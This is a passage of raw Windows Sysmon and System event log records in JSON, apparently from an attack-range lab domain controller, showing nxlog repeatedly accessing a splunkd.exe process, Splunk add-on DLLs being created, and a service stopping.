(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:39.402\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:39.402","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76853,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The Portable Device Enumerator Service service entered the stopped state.","param1":"Portable Device Enumerator Service","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:40.404\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:40.404","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:41.405\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:41.405","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:42.407\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:42.407","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.408\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.408","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.502\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\Packet.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.502","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.502","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\Packet.dll","CreationUtcTime":"2020-08-01 06:51:43.502","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.502\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\concrt140.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.502","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.502","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\concrt140.dll","CreationUtcTime":"2020-08-01 06:51:43.502","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":3170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:51:43.502\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetFilename: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\msvcp140.dll\r\nCreationUtcTime: 2020-08-01 06:51:43.502","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:51:43.502","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetFilename":"C:\\Program 